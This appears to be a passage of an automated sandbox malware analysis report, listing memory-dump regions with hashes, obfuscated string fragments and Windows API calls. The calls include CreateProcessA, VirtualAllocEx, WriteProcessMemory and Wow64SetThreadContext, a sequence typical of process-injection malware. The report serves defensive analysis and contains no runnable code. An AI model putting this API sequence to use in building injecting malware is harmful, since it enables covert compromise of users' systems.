                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 376a6d87999af6620e6cc1bfcdad9496a4015e8fc9dbaecaff0cf10c91b1640d
                                          • Instruction ID: b9463a38bdf1e24a5b946190d415871b666ef7666c449e532677be7b16f6d652
                                          • Opcode Fuzzy Hash: 376a6d87999af6620e6cc1bfcdad9496a4015e8fc9dbaecaff0cf10c91b1640d
                                          • Instruction Fuzzy Hash: 2F810974E01209DFDB44DF99D580AAEBBF6FF88300F10842AE519AB354DB34A945CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052480576.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6950000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 60dd154347efd7a89f8b98926bc35e05a127eb497caa1c7ef38c42cd2513b1d7
                                          • Instruction ID: 9662dd08e02328f7a3d7b684a46e122c04d44ecb9bfa8ac7e36556bad26eeb65
                                          • Opcode Fuzzy Hash: 60dd154347efd7a89f8b98926bc35e05a127eb497caa1c7ef38c42cd2513b1d7
                                          • Instruction Fuzzy Hash: C9512E75D056289BEB6CCF2B8D556DAFAF7AFC9300F14C0F9990CA6654EB704A818F40

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 00DAD136
                                          • GetCurrentThread.KERNEL32 ref: 00DAD173
                                          • GetCurrentProcess.KERNEL32 ref: 00DAD1B0
                                          • GetCurrentThreadId.KERNEL32 ref: 00DAD209
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3036028785.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_da0000_file.jbxd
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          • Opcode ID: 098bbc357607302eca86f83c27b41d7190ad999272f6b0abacb390b8cc24dd38
                                          • Instruction ID: 244b06983497bd25e9bffe4e81f206a555e49b11f0400b27d5871279545d72e5
                                          • Opcode Fuzzy Hash: 098bbc357607302eca86f83c27b41d7190ad999272f6b0abacb390b8cc24dd38
                                          • Instruction Fuzzy Hash: 655146B0900709CFDB14DFA9D588B9EBBF2EF49314F208459E419A7350DB789944CF66

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Haq$Haq$Haq
                                          • API String ID: 0-3013282719
                                          • Opcode ID: c49310c0a57c85255db3d19a1ea4daf215dd7ed70f744c5d3361506171f868e9
                                          • Instruction ID: 24d3150a89dabacf9672ae7fa4ea039b500f10b07beb09b160b9f1fc1b8cad45
                                          • Opcode Fuzzy Hash: c49310c0a57c85255db3d19a1ea4daf215dd7ed70f744c5d3361506171f868e9
                                          • Instruction Fuzzy Hash: 5B126BB1A002048FCBA4DFA9D484BAEB7F2FF88300F1584ADD9169B355DB31A945CB91

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q$4']q
                                          • API String ID: 0-705557208
                                          • Opcode ID: 84685ed1a51cf0e36a7443fc3e365aa02094c5ef1f07f0c0bc13eeb50ba2cf01
                                          • Instruction ID: 335f381eb5821c7561bb114f6bc6b1d23030436b472e29a4c61807a10a6c41bf
                                          • Opcode Fuzzy Hash: 84685ed1a51cf0e36a7443fc3e365aa02094c5ef1f07f0c0bc13eeb50ba2cf01
                                          • Instruction Fuzzy Hash: 91F1D974A10218CFCB44EFA4D994A9DB7B2FF89300F518198E906AB3B5DB71EC42CB51

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (aq$(aq$Haq
                                          • API String ID: 0-2456560092
                                          • Opcode ID: 76ed5044ae67ed69c81de009570ea62c87ca91c90ed01536dbfe24d6a0561472
                                          • Instruction ID: 36e27432eef53793df5d442459675c57f21017de40ab9512c1b8c6b1aaeca112
                                          • Opcode Fuzzy Hash: 76ed5044ae67ed69c81de009570ea62c87ca91c90ed01536dbfe24d6a0561472
                                          • Instruction Fuzzy Hash: C0E15974A00209DFCB54EF64D494AADBBB2FF89300F1185A9E906AB365DF30ED45CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052554175.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69a0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q
                                          • API String ID: 0-3120983240
                                          • Opcode ID: b5f1621f7d2a222c5a81ea7fb58e8ac8c3b50055076bc92dc481af5013a89e86
                                          • Instruction ID: 1f32c49a6fac0485c1d0c6ab1fea5d58dae6e7d9c75bf074d3e24d751f8c66b4
                                          • Opcode Fuzzy Hash: b5f1621f7d2a222c5a81ea7fb58e8ac8c3b50055076bc92dc481af5013a89e86
                                          • Instruction Fuzzy Hash: 7A420174E04219CFDB54CFA8D558AAEBBF6FF48300F248429D912AB654DB346E46CF90

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052554175.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69a0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q
                                          • API String ID: 0-3120983240
                                          • Opcode ID: 437cafc8a6439ec15ade1a4bf43b2280c9762025eee55df22d153ebc16b52155
                                          • Instruction ID: 4a454ffed4fe2a8b4c976424abd0a44d0f3e7fbec5d8e9b7b3c567519efa345a
                                          • Opcode Fuzzy Hash: 437cafc8a6439ec15ade1a4bf43b2280c9762025eee55df22d153ebc16b52155
                                          • Instruction Fuzzy Hash: 85F1E574D01218DFCBA4DFA4E4886EDBBB6FF49311F24852AE416A7350CB316A85CF81

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (aq$d
                                          • API String ID: 0-3557608343
                                          • Opcode ID: a6872a532c57e697160e8bcab0d2cbec66e01f2e2a88d2308ea72d841414f1d1
                                          • Instruction ID: 7b4fcbdd90d40a0f44d83bac568002bbedd29fa8cb4da6837144a24f10ec0d1f
                                          • Opcode Fuzzy Hash: a6872a532c57e697160e8bcab0d2cbec66e01f2e2a88d2308ea72d841414f1d1
                                          • Instruction Fuzzy Hash: 59D19075600601CFCB15CF68D480AAAB7F2FF88314B16C5A9D85A8B365DB30FC96CB90

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052554175.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69a0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$4']q
                                          • API String ID: 0-3120983240
                                          • Opcode ID: d9896e393c42c20082efe319e8cf5478a22d7def589cee76cc6f11aa251d7c1a
                                          • Instruction ID: 5b34f8477b2ae71887d1b55f617e5449ea8b21175e24cee5bb65602c914f3f0d
                                          • Opcode Fuzzy Hash: d9896e393c42c20082efe319e8cf5478a22d7def589cee76cc6f11aa251d7c1a
                                          • Instruction Fuzzy Hash: FCA1E674E01219CFDB58DFA8D5486ADBBF6FF88301F258429E81267750CB346A86CF91

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (aq$(aq
                                          • API String ID: 0-3916115647
                                          • Opcode ID: 1ec8120756c7ddfe82b1c99873b318621ba8411aae73c46f14a7c61013ad6275
                                          • Instruction ID: 63b9c2124cc42d577e8e9ac30766c9446b23351f5093db81dd7ab0ab6d4499f8
                                          • Opcode Fuzzy Hash: 1ec8120756c7ddfe82b1c99873b318621ba8411aae73c46f14a7c61013ad6275
                                          • Instruction Fuzzy Hash: BB51A0317002458FCB55AF69E850AEE3BA6FF84350F1580A9E9058F396CF35DD46CBA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (aq$Haq
                                          • API String ID: 0-3785302501
                                          • Opcode ID: 9e5f2ad44176ece9df6c3ddb5fbd97254cdafb8d8330a8feff2ae8d381c57325
                                          • Instruction ID: 1f81f845fec924c85c181a4d57aaaf01c14e8521d844e247aacd1d34663823ea
                                          • Opcode Fuzzy Hash: 9e5f2ad44176ece9df6c3ddb5fbd97254cdafb8d8330a8feff2ae8d381c57325
                                          • Instruction Fuzzy Hash: 43517C75B006148FC799AF28D454A6E7BA3FFC9300B1144ACEA069B3A5DF31ED06DB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4']q$W
                                          • API String ID: 0-897312741
                                          • Opcode ID: a38890bc3a9952baa3ca90791471c46bc76cd00c84ef3f580f668dd8aec81b79
                                          • Instruction ID: cf22d9aa232ee11aa6fed54a67533e715d8ebf56af104ef89dda036b24eec616
                                          • Opcode Fuzzy Hash: a38890bc3a9952baa3ca90791471c46bc76cd00c84ef3f580f668dd8aec81b79
                                          • Instruction Fuzzy Hash: E831A2767002009FCF49AFA4D954E997BB3FF88310F0540A9EA0AAB375DA72DC12DB51
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052795411.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6a20000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: c$n
                                          • API String ID: 0-3996254610
                                          • Opcode ID: ffc50a2ed760a3936829dd1e30f9b5753b3d80499ede1c8395cb69bf862dc823
                                          • Instruction ID: ffb5230a5f00b423d6410bfde30d19f39d02e370e35554a72bb0b0c9e7638f2b
                                          • Opcode Fuzzy Hash: ffc50a2ed760a3936829dd1e30f9b5753b3d80499ede1c8395cb69bf862dc823
                                          • Instruction Fuzzy Hash: 65F0F974D9527BCFDBA0EF58C984BADB7B1BF09318F0004E9D509A2282C3745A80CF81
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,aq
                                          • API String ID: 0-3092978723
                                          • Opcode ID: 055d12d0542c5ad23ceec310c480f4cf8274ff8d5f82ad9739ebcb07c287cd1d
                                          • Instruction ID: ff880060e3d31b431616e5e541947a7411fca1c476adf78cd1562a637db21717
                                          • Opcode Fuzzy Hash: 055d12d0542c5ad23ceec310c480f4cf8274ff8d5f82ad9739ebcb07c287cd1d
                                          • Instruction Fuzzy Hash: 1F52F9B5A002288FDB64DF69C945BDDBBF6FB88300F1541E9E909A7351DA309E81CF61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (_]q
                                          • API String ID: 0-188044275
                                          • Opcode ID: 982cb09b3a5bac541e582732a06f0ef329a0a3a4881537f480b7c90ac07ddf89
                                          • Instruction ID: db8eac6b3a7d106427c6bcfdf584e439e18e1b068b0351902226b95eb96d8499
                                          • Opcode Fuzzy Hash: 982cb09b3a5bac541e582732a06f0ef329a0a3a4881537f480b7c90ac07ddf89
                                          • Instruction Fuzzy Hash: 2B2249B5A00604DFDB54DFA8D490BA9B7F2FF88300F1684A9E915AB391DB71ED41CB90
                                          APIs
                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06CE836A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 80da4d8058576b4ffd889c3bdbd242d41a9d0e457fdae7d503bc3c7de1163b0c
                                          • Instruction ID: 4ec2b3e8d5ff7d2fb22b1943994d3d3524a4b82b2b193af4c64621fbd15f9d83
                                          • Opcode Fuzzy Hash: 80da4d8058576b4ffd889c3bdbd242d41a9d0e457fdae7d503bc3c7de1163b0c
                                          • Instruction Fuzzy Hash: 818145B1D016099FDB54CFA9C8857EEBBF1FF48310F148529E858EB280DB789981CB91
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00DAAC7E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3036028785.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_da0000_file.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: f9d00bdcf517d619e23b9d5ef19105f24a1931c96f20b96162ac5c9f89f9adde
                                          • Instruction ID: 99c77e252cb85440c995552f2552f2658517c2ee78aa97a151539a9e785cf200
                                          • Opcode Fuzzy Hash: f9d00bdcf517d619e23b9d5ef19105f24a1931c96f20b96162ac5c9f89f9adde
                                          • Instruction Fuzzy Hash: 7E814570A00B058FDB24DF69D55179ABBF6FF89300F048A2DD48AD7A50DB34E949CBA1
                                          APIs
                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06CE836A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 30c46a78b36e449d14f1109acf8834f52c2558d83217e6896f8e32ec5a4cc200
                                          • Instruction ID: 25ce155325d894dbf55df013bfdfe6a82395decf528ec7f3a8f11144db55cc6a
                                          • Opcode Fuzzy Hash: 30c46a78b36e449d14f1109acf8834f52c2558d83217e6896f8e32ec5a4cc200
                                          • Instruction Fuzzy Hash: 60813571D016098FDB50CFA9C8857EEBBF2FF48310F14852AE858E7280DB789981CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $]q
                                          • API String ID: 0-1007455737
                                          • Opcode ID: 87a85373f16b793dccaed12622403117afa64036d23e98a44cced334da73e0d6
                                          • Instruction ID: c813fa8790fe1afff3d92fe962504dd3977173d1fcbe1ee842a39359601ed38a
                                          • Opcode Fuzzy Hash: 87a85373f16b793dccaed12622403117afa64036d23e98a44cced334da73e0d6
                                          • Instruction Fuzzy Hash: 94E1B5B6B042618FE7A59F28D4517AE7BE2FFC5300F1540A9E982CB395DA34CD41CB52
                                          APIs
                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06CE96A8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: d3d7c373e9f41ef9c1963571ae3923e674cbc8b708c7cbdbb9dc4d0ea3ebb01a
                                          • Instruction ID: a5be5eb47c308bddb54a1b14c2dd2279a9513b40e71baea7bac892bd3ee68cd4
                                          • Opcode Fuzzy Hash: d3d7c373e9f41ef9c1963571ae3923e674cbc8b708c7cbdbb9dc4d0ea3ebb01a
                                          • Instruction Fuzzy Hash: BA2144B5D00209DFCB50CFA9C884BEEBBF5FF88310F10842AE919A7250D7799941CBA0
                                          APIs
                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06CE96A8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 3180c5524bd33c29db861186c85438550eb0903f32382d7c9059c8b65b949d34
                                          • Instruction ID: b44516f47a2e10738c94df2d6e08810ba812c76542b51657f01dcb9762eae693
                                          • Opcode Fuzzy Hash: 3180c5524bd33c29db861186c85438550eb0903f32382d7c9059c8b65b949d34
                                          • Instruction Fuzzy Hash: 1D2136B5D003099FCB50DFAAC885BEEBBF5FF48310F10842AE919A7240D7789944CBA1
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CE8DDE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 6e305cb727e4b8723ac246b420d93a021ce2209381592f97096a26be23ba9ab6
                                          • Instruction ID: a1cd064dadaa9cb7a5d838e53154a09e50862f6651812c99cbd9212d3791806a
                                          • Opcode Fuzzy Hash: 6e305cb727e4b8723ac246b420d93a021ce2209381592f97096a26be23ba9ab6
                                          • Instruction Fuzzy Hash: AF2168B5D003098FDB50DFAAC8857EEBBF4EF58310F10842AD459A7240CB789A45CFA1
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06CE8DDE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: a2c03a985786d9f3ac86f5d463b1f728bf316649efc354f751e21adf3e8e9861
                                          • Instruction ID: 8490808a4d54cbeed7fc6d2b38309cb225cadc36af0de0e67c9ec898d5f3a299
                                          • Opcode Fuzzy Hash: a2c03a985786d9f3ac86f5d463b1f728bf316649efc354f751e21adf3e8e9861
                                          • Instruction Fuzzy Hash: 5A2115B5D002098FDB50DFAAC8857EEBBF5EF48314F14842AD519A7240CB78AA45CFA5
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06CD73AC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053333600.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6cd0000_file.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 8f387196c181d1dcf0aca3f65c188c88e3e61a8d809ea177abafadc3fdc67aaf
                                          • Instruction ID: a78555ab00c928fbbad028375aabc41c5c79e10b5ce869e1b079371f96552821
                                          • Opcode Fuzzy Hash: 8f387196c181d1dcf0aca3f65c188c88e3e61a8d809ea177abafadc3fdc67aaf
                                          • Instruction Fuzzy Hash: 712107B19002499FDB10DFAAC845BEEFBF5EF88310F54842DD559A7240CB789545CFA1
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00DAD387
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3036028785.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_da0000_file.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: e1bda8820dcba3cfec5e7185a3c2ddea59167f2d871e0a1d603564ed6d050675
                                          • Instruction ID: d4105695243b50acbe2b9a94787466212fc0b4d4ec7922e4495489038826095c
                                          • Opcode Fuzzy Hash: e1bda8820dcba3cfec5e7185a3c2ddea59167f2d871e0a1d603564ed6d050675
                                          • Instruction Fuzzy Hash: 0521C2B59002489FDB10CFAAD984ADEBFF9FB48310F14841AE919A3350D378A954CFA5
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06CD73AC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053333600.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6cd0000_file.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: b7014eae53d88887682a6c7f7ef27efc8d0722f45e99c17132bf09416ffea96a
                                          • Instruction ID: f2a5e5e1645e23297f62598f8d5de9d9fcde2f663b3f47d53d36b8fb3068fc6f
                                          • Opcode Fuzzy Hash: b7014eae53d88887682a6c7f7ef27efc8d0722f45e99c17132bf09416ffea96a
                                          • Instruction Fuzzy Hash: E421E5B1D002099FDB10DFAAC845AEEFBF5EF48320F548429D519A7240CB789945CFA1
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06CE93DE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 15896559c2d8b8603906cf83c7252638032c9b00fa7b66835b1d021c4dbe0401
                                          • Instruction ID: b116e10fc55c7a64faf6a401bf01571a7ac289a6248e064020181e6a781193ce
                                          • Opcode Fuzzy Hash: 15896559c2d8b8603906cf83c7252638032c9b00fa7b66835b1d021c4dbe0401
                                          • Instruction Fuzzy Hash: FF113AB58002499FCB20DFAAC845ADFFFF5EF48320F108419E519A7250CB799541CFA1
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 0695E0BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052480576.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6950000_file.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 49a99cf35027b818153e79e8f3e8a1db2f32bb294fadc19470e14fd50e7a4a50
                                          • Instruction ID: e7fe1be73b9294adf773a9bcd4564d7e03888f3583447548a1e0c0643d289907
                                          • Opcode Fuzzy Hash: 49a99cf35027b818153e79e8f3e8a1db2f32bb294fadc19470e14fd50e7a4a50
                                          • Instruction Fuzzy Hash: 9E11D6B5D002499FDB10DFAAC844AEEFBF9FF48310F14842AD519A7250CB79A945CFA1
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 00DA959D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3036028785.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_da0000_file.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: c30169f56b657568fbfe9846ca5ed863f6bde12f8b63cb54ce8004a2ad010d33
                                          • Instruction ID: be7e6f87f5385f4e9f4e97e7ded313191ddda4b2942a40dffd3cdfdfb63ce622
                                          • Opcode Fuzzy Hash: c30169f56b657568fbfe9846ca5ed863f6bde12f8b63cb54ce8004a2ad010d33
                                          • Instruction Fuzzy Hash: BB21C0B48043C4CEDB11DF59D4153EEBFF4EB06300F548499C599B3682C3399648CBA1
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06CE93DE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053373141.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ce0000_file.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: fba70ed67af148d5b2ea3cc5de26b8543d17d5d2d2da4b97a6ca31e75a703305
                                          • Instruction ID: 0e7088f16565dc9e9fb3a3898bdd8d217df9c4818607c8d3f13bd3f2b110ccf1
                                          • Opcode Fuzzy Hash: fba70ed67af148d5b2ea3cc5de26b8543d17d5d2d2da4b97a6ca31e75a703305
                                          • Instruction Fuzzy Hash: 2F1137B58002499FCB10DFAAC845AEEBFF5EF48310F108419E519A7250CB79A540CFA1
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00DAAC7E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3036028785.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_da0000_file.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 65e328b7ebae85a6a04f96437721aa2d77fecf4c68f4696f93313dba2d0db675
                                          • Instruction ID: 4f6dac7cfb58c6dd29169aa8a2a2a3bc8aec121742e0b85599a89332195cf886
                                          • Opcode Fuzzy Hash: 65e328b7ebae85a6a04f96437721aa2d77fecf4c68f4696f93313dba2d0db675
                                          • Instruction Fuzzy Hash: 7511DFB5C002498FDB10DF9AC944ADEFBF4EB89324F14851AD819B7210C379A545CFA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          APIs
                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 0695F09B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052480576.0000000006950000.00000040.00000800.00020000.00000000.sdmp, Offset: 06950000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6950000_file.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_69c0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7dc23da430ef4fcdcf9ca9735926a883e4fb4b5b564bd78340319f02b4c45d9b
